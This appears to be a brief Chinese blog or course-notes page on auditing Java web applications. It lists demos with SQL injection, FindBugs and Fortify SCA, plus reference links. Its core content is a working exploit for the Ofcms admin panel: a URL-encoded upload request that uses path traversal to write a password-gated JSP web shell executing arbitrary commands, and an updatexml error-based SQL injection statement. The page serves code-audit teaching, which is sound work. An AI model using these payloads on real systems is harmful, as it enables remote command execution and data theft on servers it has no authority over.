代码审计-JAVA项目注入上传搜索或插件挖掘
演示案例:
- 简易Demo段SQL注入及预编译
- IDEA审计插件FindBugs安装使用
- Fortify_SCA代码自动审计神器使用
- Ofcms后台SQL注入-全局搜索关键字
- Ofcms后台任意文件上传-功能点测试
Ofcms Payload:
file_path=&dirs=%2F&res_path=res&file_name=../../static/jsp_shell.jsp&file_content=%3C%25%0A++++if(%22p0desta%22.equals(request.getParameter(%22pwd%22)))%7B%0A++++++++java.io.InputStream+in+%3D+Runtime.getRuntime().exec(request.getParameter(%22i%22)).getInputStream()%3B%0A++++++++int+a+%3D+-1%3B%0A++++++++byte%5B%5D+b+%3D+new+byte%5B2048%5D%3B%0A++++++++out.print(%22%3Cpre%3E%22)%3B%0A++++++++while((a%3Din.read(b))!%3D-1)%7B%0A++++++++++++out.println(new+String(b))%3B%0A++++++++%7D%0A++++++++out.print(%22%3C%2Fpre%3E%22)%3B%0A++++%7D%0A%25%3E
update of_cms_link set link_name=updatexml(1,concat(0x7e,(database())),0) where link_id=4
涉及资源:
https://www.cnblogs.com/csnd/p/11807776.html
https://blog.csdn.net/x62982/article/details/88392968
https://blog.csdn.net/weily11/article/details/80643472
https://www.cnblogs.com/kingsonfu/p/12419817.html
https://www.cnblogs.com/1987721594zy/p/9186584.html
https://pan.baidu.com/s/1QF2kqkUUZgPtwbmKBtg4bw 提取码:xiao
若有收获,就点个赞吧
0 人点赞
